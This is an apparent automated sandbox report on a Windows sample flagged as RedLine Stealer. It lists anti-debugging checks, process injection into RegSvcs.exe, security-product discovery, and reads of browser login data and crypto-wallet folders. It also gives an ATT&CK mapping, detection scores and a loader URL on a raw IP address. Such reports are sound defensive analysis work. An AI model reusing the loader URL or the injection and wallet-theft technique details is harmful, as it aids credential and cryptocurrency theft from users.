Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B8B348 FindFirstFileExA,	0_2_00B8B348
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001AC80B FindFirstFileExW,	1_2_001AC80B
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0138C80B FindFirstFileExW,	2_2_0138C80B

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B87DEE mov eax, dword ptr fs:[00000030h]	0_2_00B87DEE
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001AD941 mov eax, dword ptr fs:[00000030h]	1_2_001AD941
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001A3251 mov eax, dword ptr fs:[00000030h]	1_2_001A3251
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001EF7CC mov eax, dword ptr fs:[00000030h]	1_2_001EF7CC
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0138D941 mov eax, dword ptr fs:[00000030h]	2_2_0138D941
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01383251 mov eax, dword ptr fs:[00000030h]	2_2_01383251
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0144EFFF mov eax, dword ptr fs:[00000030h]	2_2_0144EFFF

Source: C:\Windows\Temp\123.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Temp\123.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00B7F838

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B8C030 GetProcessHeap,

0_2_00B8C030

Source: C:\Windows\Temp\123.exe

Code function: 1_2_00191F6D GetModuleHandleA,VirtualProtect,LdrInitializeThunk,

1_2_00191F6D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B7F9D5 SetUnhandledExceptionFilter,	0_2_00B7F9D5
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B7F838
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B7FBCA
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B88EBD
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0019862B SetUnhandledExceptionFilter,	1_2_0019862B
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001984C9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_001984C9
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00198735 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00198735
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0019FF93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0019FF93
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013784C9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_013784C9
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01378735 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_01378735
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0137FF93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0137FF93

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\Temp\123.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\Temp\123.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Temp\123.exe

Code function: 1_2_001EF801 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

1_2_001EF801

Writes to foreign memory regions

Source: C:\Windows\Temp\123.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\Temp\123.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 111B008	Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\Temp\321.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1038008	Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Process created: C:\Windows\Temp\123.exe "C:\Windows\Temp\123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Process created: C:\Windows\Temp\321.exe "C:\Windows\Temp\321.exe"	Jump to behavior
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_00B7AF0F
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,	1_2_001AF9EA
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_001AFB10
Source: C:\Windows\Temp\123.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	1_2_001AF384
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,	1_2_001AFC16
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,	1_2_001A84AC
Source: C:\Windows\Temp\123.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_001AFCE5
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_001AF626
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_001AF671
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_001AF70C
Source: C:\Windows\Temp\123.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_001AF797
Source: C:\Windows\Temp\123.exe	Code function: EnumSystemLocalesW,	1_2_001A7F8A
Source: C:\Windows\Temp\321.exe	Code function: GetLocaleInfoW,	2_2_0138F9EA
Source: C:\Windows\Temp\321.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0138FB10
Source: C:\Windows\Temp\321.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_0138F384
Source: C:\Windows\Temp\321.exe	Code function: GetLocaleInfoW,	2_2_0138FC16
Source: C:\Windows\Temp\321.exe	Code function: GetLocaleInfoW,	2_2_013884AC
Source: C:\Windows\Temp\321.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_0138FCE5
Source: C:\Windows\Temp\321.exe	Code function: EnumSystemLocalesW,	2_2_0138F70C
Source: C:\Windows\Temp\321.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_0138F797
Source: C:\Windows\Temp\321.exe	Code function: EnumSystemLocalesW,	2_2_01387F8A
Source: C:\Windows\Temp\321.exe	Code function: EnumSystemLocalesW,	2_2_0138F626
Source: C:\Windows\Temp\321.exe	Code function: EnumSystemLocalesW,	2_2_0138F671

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B7F654 cpuid

0_2_00B7F654

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00B7DF1E

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B6B146 GetVersionExW,

0_2_00B6B146

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Source: Report.wer.5.dr	Binary or memory string: UI[2]=C:\Windows\Temp\123.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Report.wer.5.dr	Binary or memory string: LoadedModule[0]=C:\Windows\Temp\123.exe
Source: 1JCAVkYU3U.exe, 00000000.00000002.273694562.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 123.exe, 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: C:\Windows\Temp\123.exe
Source: 1JCAVkYU3U.exe, 00000000.00000002.275256845.00000000077B2000.00000004.00000020.00020000.00000000.sdmp, 1JCAVkYU3U.exe, 00000000.00000002.273694562.00000000055D2000.00000004.00000020.00020000.00000000.sdmp, Amcache.hve.5.dr, WER4202.tmp.dmp.5.dr, Amcache.hve.LOG1.5.dr	Binary or memory string: 123.exe
Source: Amcache.hve.5.dr, Amcache.hve.LOG1.5.dr	Binary or memory string: c:\windows\temp\123.exe
Source: Report.wer.5.dr	Binary or memory string: AppPath=C:\Windows\Temp\123.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.3.123.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.1c3a80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.1c3a80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.471223737.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.264083282.0000000000C92000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5168, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: RegSvcs.exe, 00000003.00000002.511890527.0000000006427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*)
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: RegSvcs.exe, 00000003.00000002.511890527.0000000006427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*)
Source: RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: RegSvcs.exe, 00000003.00000002.511890527.0000000006427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Source: Yara match	File source: 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5168, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.3.123.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.1c3a80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.1c3a80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.123.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.471223737.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.264083282.0000000000C92000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5168, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	11 Registry Run Keys / Startup Folder	411 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	Security Account Manager	146 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	4 Software Packing	NTDS	361 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	13 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	231 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	231 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	411 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1JCAVkYU3U.exe	46%	ReversingLabs	Win32.Spyware.RedLine
1JCAVkYU3U.exe	31%	Virustotal		Browse
1JCAVkYU3U.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Temp\123.exe	100%	Joe Sandbox ML
C:\Windows\Temp\321.exe	100%	Joe Sandbox ML
C:\Windows\Temp\123.exe	38%	ReversingLabs	Win32.Trojan.Pwsx
C:\Windows\Temp\321.exe	36%	ReversingLabs	Win32.Trojan.Pwsx

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.RegSvcs.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
2.0.321.exe.1370000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File
1.3.123.exe.c90000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
1.2.123.exe.190000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File
1.0.123.exe.190000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File
6.2.RegSvcs.exe.40746cc.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.321.exe.1370000.0.unpack	100%	Avira	TR/ATRAPS.Gen4	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://tempuri.org/Entity/Id19Responseon	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys5	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
